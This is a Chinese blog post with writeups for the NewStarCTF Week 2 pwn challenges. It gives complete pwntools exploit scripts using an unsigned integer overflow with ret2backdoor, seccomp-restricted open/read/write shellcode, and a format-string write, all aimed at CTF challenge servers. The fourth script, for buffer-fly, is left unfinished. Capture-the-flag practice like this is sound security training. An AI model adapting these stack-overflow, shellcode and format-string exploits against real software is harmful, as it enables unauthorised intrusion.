NewStarCTFWEEK2 pwn题解

最新推荐文章于 2023-10-20 11:01:11 发布
最新推荐文章于 2023-10-20 11:01:11 发布
阅读量678 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127059451
版权

NewStarCTFWEEK2

uint32 and ret:

就是个负数转无符号会变为一个很大的数,就能溢出,然后太大也不行read不了,找一下64位无符号int是多少,然后对应减掉一点,用gdb调试一下就知道了,还有就是用ret调一下

from pwn import *
local_file  = './uint'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25835 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
ret=0x40101a
backdoor=0x4011b6
sl(str(4294967094))
#debug()
sl('a'*0x58+p64(ret)+p64(backdoor))
r.interactive()

shellcode-revenge:

禁用了execve
请添加图片描述
保护就canary没开
请添加图片描述
思路:就是第一个read往mmap地址写 (调用read往mmap+21地址写0x800字节函数)的汇编(注:21是因为汇编长度为21),写入orw后会紧接着执行orw语句,
栈溢出跳到mmap

from pwn import *
local_file  = './pwn'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25278 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
mmap=0x233000
se(asm(shellcraft.read(0,mmap+21,0x800)))
print len(asm(shellcraft.read(0,mmap+21,0x800)))
orw_payload=shellcraft.open('./flag')
orw_payload+=shellcraft.read(3,mmap+0x850,0x50)   
orw_payload+=shellcraft.write(1,mmap+0x850,0x50)
print(len(orw_payload))
sl('a'*0x38+p64(mmap))
sl(asm(orw_payload))
r.interactive()

砍一刀:

这题有格式化字符串漏洞
请添加图片描述
偏移为8
请添加图片描述
所以只要改diamond为10即可
diamond=0x404090
注意64位p64(diamond)要放在后面,不然要被截断
想了很久怎么去交互,这个脚本只能说极小概率成功,多试几次

from pwn import *
local_file  = './pwn2'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = '/lib/x86_64-linux-gnu/libc.so.6'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',28562)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
sl('')
sl('')
sl('666')
sl('')
for i in range(18):
    sl('')
for i in range(20):
	sl('')
for i in range(100):
    sl('%'+'10'+'c%10$n'+'a'*7+p64(0x404090))
r.interactive()

请添加图片描述

buffer-fly

不会,先记着

from pwn import *
local_file  = './buffer_fly'
local_libc  = './libc-2.31.so'
remote_libc = './libc-2.31.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25945 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
sea('give me your name: ','a'*0x20)
stack_addr=uu64(ru('\x7f')[-6:])
info('stack_addr',stack_addr)
sl('')
#sea('give me your age: ',str(stack_addr))
#addr=
#info('addr',addr)
#base=stack_addr-libc.sym['_libc_csu_init']
#print hex(base)
sla('susu give me your wechat number: ','a'*0x20+p64(stack_addr)+p64(stack_addr+0x38))
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc2pwn 入门题
02-11
pwn 入门题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc1pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
google_pwn2own
04-10
google_pwn2own专门介绍,可以帮助大家对于这一部分的知识有进一步的认识
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3232
【活着得,怎么就轻松惬意了,无需愧疚。】
NewStarCTF公开赛week2密码学题目wp
Altering_Ji的博客
10-09 2734
NewStarCTF公开赛第二周密码学全部五道题目的wp,重点是LCG和Rabin。
NewStarCTF 2023 公开赛道 WEEK2|Crypto
qq_73643549的博客
10-11 1212
获取一组发现难以解密,所以考虑靶机特性,因为是对同一个明文加密,所以我们。但是看到题目只解一半,也就说m > q,即k4 < 0, 所以h就是我们要求取的系数。因此可以使用广播攻击(见题,如果关注到题目含义就能很快反应,笔者是崩溃的过程中提出为什么给我这么恶心的靶机才意识到的)。根据加密过程,我们知道这里应该采取费马费解法,所以我们可以把n丢到yafu中去,可以获取得到两个因子。好好分析还是挺简单的,因为只需要搞清楚h是什么就可以了。知道(p,q)后,我们就可以破解RSA了。,我们提取出(p-1)。
NewStarCTF 公开赛赛道week2 web writeup
your_friends的博客
10-02 733
利用mt_srand是伪随机数用它给出的Hint到php_mt_seed里面直接跑。如果我们post提交了一个data那么他就不会执行后面的文件从而执行我们自己的输入。由Easy::__call方法进入eeee::__clone。进入__invoke需要调用到Start::__isset。上周做题被这道sql注入整感动了,这次增加难度又来了。由Sec::__tostring进入__call方法。最终调用点在Sec::__invoke。发现我们直接在页面查询是输入了一个id。虽然加了点难度,但是还是挺简单。
NewStarCTF 2023 R!C!E!
weixin_73560599的博客
10-02 642
如果直接按这个变量名来传参,php 是无法接收到这个值的,具体原因是 php 会自动把一些不合法的字符转化为下划线,比如这个点就会被转换为下划线,另外这种转换只会发生一次。本来是cat就好 但是这里cat被过滤了 cat被过滤的话 可以使用通配符绕过 但是这里需要加上/bin目录 加上路径后才可以模糊匹配 通配符才会有用 这里大家需要注意 一个路径的问题 不加/bin路径是没用的。这样的话 我们就需要使用echo这个命令 然后是反引号包裹将其执行的命令打印输出了 不然我们看不到回显的结果。
NewStarCTF 2023 公开赛道 Week2
Fab1an的博客
10-16 991
时,得到的结果只是phpinfo()这个字符串,它只是将我们构造的array_rand(array_flip(getallheaders()))给执行了而已,所以我们要先用一个eval将array_rand(array_flip(getallheaders()))变为phpinfo();如果在后面,可以用array_reverse()将数组反转过来之后,再用current拿它,它在中间就不好搞了,又不能用next套娃,因为next的参数要是数组,第一次next完成之后就不是数组了,变成字符串了。
NewStarCTF2023week2-游戏高手
Welcome To Myon'Blog !
10-14 362
再创建了一个对象 data,其中包含了游戏分数,然后使用 JSON.stringify(data) 将该对象转换为 JSON 格式的字符串,使用 xhr.send() 发送这个 JSON 字符串给服务器;最后的代码用于重置游戏状态,将游戏分数重置为 0,将curPhase设置为PHASE_READY,并重新创建hero对象。因此,这里只需要对gameScore进行一个伪造即可,但是要注意json字符串格式 {"key":value},js代码审计,定位到输出flag的地方。直接在hackbar好像不行。
Crypto(4)NewStarCTF 2023 week2 Crypto Rotate Xor
最新发布
m0_66039322的博客
10-20 490
直接逆着rotate_right即可。
NewStarCTF 公开赛赛道 WEEK2 pwn 砍一刀
weixin_51890658的博客
11-15 619
pwn
NewStarCTF pwn
iczfy585的博客
10-21 957
NewStarCTFpwn的一些wp
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1658
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
pwn】学pwn日记(堆结构学习)(随缘更新)
woodwhale的博客
08-20 4452
pwn】学pwn日记(堆结构学习) 1、什么是堆? 堆是下图中绿色的部分,而它上面的橙色部分则是堆管理器 我们都知道栈的从高内存向低内存扩展的,而堆是相反的,它是由低内存向高内存扩展的 堆管理器的作用,充当一个中间人的作用。管理从操作系统中申请来的物理内存,如果有用户需要,就提供给他。 2、了解堆管理器 注意:linux使用glibc 这里有两种申请内存的系统调用: brk mmap 第一种brk,是将heap下方的data段(bss属于data段),向上扩展申请的内存。 第二种mmap,其实下
[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode)
mcmuyanga的博客
04-12 480
[BSidesCF 2019]Runit 例行检查,32位程序,开启了nx保护 运行一下看看大概的情况 ida载入 虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 exp from pwn import * p=remote("node3.buuoj.cn",25055) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendlin
第三周pwn
weixin_59339137的博客
12-04 375
pwn
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值